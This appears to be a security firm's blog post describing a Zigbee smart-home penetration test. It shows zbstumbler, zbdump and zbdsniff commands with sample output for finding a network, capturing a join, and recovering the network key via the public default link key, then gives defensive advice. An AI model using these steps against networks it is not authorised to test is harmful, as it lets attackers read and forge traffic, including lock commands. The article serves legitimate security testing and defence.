Berkner Tech

Berkner Tech Modern Hardware Security

Zigbee Security Testing for Smart Home Devices

Zigbee security testing pipeline for smart home devices, from channel scan to recovering the network key

Zigbee runs a huge share of smart-home gear: bulbs, sensors, locks, hubs. Its security rests entirely on key management, and the default link key that lets devices join is public knowledge. Capture the right handshake and the network key often falls into your lap. Here is how a Zigbee assessment goes.

Why Zigbee Keys Are the Whole Story

Zigbee encrypts its traffic, so the security of a network is the security of its keys. Devices join using a link key, then receive the network key. When the link key is the published default, anyone who captures a join can decrypt everything that follows.

Step 1: Find the Network

Sweep the 2.4 GHz Zigbee channels for active networks. zbstumbler reports the PAN ID and channel of anything it hears:

zbstumbler
Example output
zbstumbler: Transmitting and receiving on interface 'kb0'

New Network: PANID 0x1A62  Source 0x0000
        Channel: 15
        Stack Profile: ZigBee PRO

Step 2: Capture the Join

Lock onto the channel and record. The frames you want are the ones exchanged when a device joins:

Anatomy of a zbdump Zigbee capture command with channel and output file flags
zbdump -c 15 -w capture.pcap
Example output
zbdump: listening on 'kb0', link-type DLT_IEEE802_15_4
^C24 packets captured

Step 3: Recover the Key

If a join was captured while the device used the default link key, the network key was transported in the clear to anyone who knows that key. zbdsniff pulls it out:

zbdsniff capture.pcap
Example output
Processing capture.pcap
NWK Key found: 01 03 05 07 09 0b 0d 0f 00 02 04 06 08 0a 0c 0e

With the network key, every frame on that network is now readable and forgeable. That is a critical finding for any product that relies on Zigbee for a security function.

Three Zigbee Weak Points

The same handful of issues show up across Zigbee products:

Three Zigbee security weak points: default link key, open join, and frame replay

Defending a Zigbee Product

Use install codes or a unique pre-configured link key per device instead of the public default, keep permit-join closed except during a short, user-initiated pairing window, and enforce frame-counter checks so replayed commands are rejected. A security function such as a lock should never trust the Zigbee link alone.

Where This Fits

Zigbee testing, from recovering keys to proving a command can be replayed, is a standard part of a smart-home penetration test. That radio work is the kind of work we do at Berkner Tech.

References and Further Reading